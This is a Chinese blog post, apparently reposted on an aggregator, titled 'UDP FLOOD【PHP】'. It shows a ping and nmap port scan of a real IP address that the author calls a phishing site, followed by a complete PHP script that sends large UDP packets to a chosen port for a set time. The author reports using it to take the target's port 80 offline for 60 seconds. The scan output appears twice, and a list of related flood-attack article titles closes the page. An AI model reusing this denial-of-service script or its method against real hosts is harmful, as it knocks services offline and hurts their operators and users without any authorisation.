UDP FLOOD【PHP】
来源:互联网 发布:跟聪明的女朋友知乎 编辑:程序博客网 时间:2024/05/16 07:42
test.php
测试目标:http://zzqgx.com/ (一个钓鱼网站)
目标信息:
PING zzqgx.com (118.193.197.40): 56 data bytes
64 bytes from 118.193.197.40: icmp_seq=0 ttl=105 time=99.915 ms
sudo nmap -sS 118.193.197.40
Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-25 17:24 CST
Nmap scan report for 118.193.197.40
Host is up (0.083s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
19/tcp filtered chargen
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1025/tcp filtered NFS-or-IIS
1026/tcp open LSA-or-nterm
1900/tcp filtered upnp
2301/tcp open compaqdiag
3389/tcp open ms-wbt-server
4444/tcp filtered krb524
6129/tcp filtered unknown
阻塞80端口
本地测试:
http://***/test.php?ip=118.193.197.40&port=80&time=60
target down!
60秒内此网页无法加载
参考网上php 代码所修改
<?php $packets = 0; $ip = $_GET["ip"]; $rand = $_GET["port"]; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET["time"]; $time = time(); print "Flooded: $ip on port $rand <br><br>"; $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } }
测试目标:http://zzqgx.com/ (一个钓鱼网站)
目标信息:
PING zzqgx.com (118.193.197.40): 56 data bytes
64 bytes from 118.193.197.40: icmp_seq=0 ttl=105 time=99.915 ms
sudo nmap -sS 118.193.197.40
Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-25 17:24 CST
Nmap scan report for 118.193.197.40
Host is up (0.083s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
19/tcp filtered chargen
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1025/tcp filtered NFS-or-IIS
1026/tcp open LSA-or-nterm
1900/tcp filtered upnp
2301/tcp open compaqdiag
3389/tcp open ms-wbt-server
4444/tcp filtered krb524
6129/tcp filtered unknown
阻塞80端口
本地测试:
http://***/test.php?ip=118.193.197.40&port=80&time=60
target down!
60秒内此网页无法加载
1 0
- UDP FLOOD【PHP】
- UDP Flood
- ICMP Flood 攻击、UDP Flood 攻击、SYN Flood 攻击
- 未配置防火墙引发的UDP Flood
- UDP flood 原理及源码 C实现
- [李景山php] HTTP Flood防御
- [李景山php] DNS Flood防御
- flood
- Flood
- DDoS攻击原理及防护方法论(5)--UDP FLOOD攻击
- SYN,ICMP, UDP Flood攻击原理与防护
- SYN,ICMP, UDP Flood攻击原理与防护
- [李景山php] ddos 攻击之 SYN Flood
- [李景山php] syn flood 攻击防御方案
- [李景山php] ddos 攻击 值 DNS Query Flood
- [李景山php] ddos 攻击 之 HTTP Flood 别名 cc攻击
- phpddos应对 最近新起一种udp flood的攻击形式
- php udp压力测试
- Android开发地图应用--坐标转换
- untiy 3d ShaderLab_第9章_1_平面阴影(二) 点光源对平面的投影
- iOS之RunTime浅谈
- myeclipse的debuge模式启动缓慢
- CSS3的REM设置字体大小
- UDP FLOOD【PHP】
- excel导出模板带有下拉的模板
- Android —— Handler进阶(未完持续)
- 常用sql脚本
- spring aop execution表达式
- Unity3D自学笔记——Transform
- 带多行下划线的EditText
- Linux 下使用openSSL 生成RSA密钥对
- 指针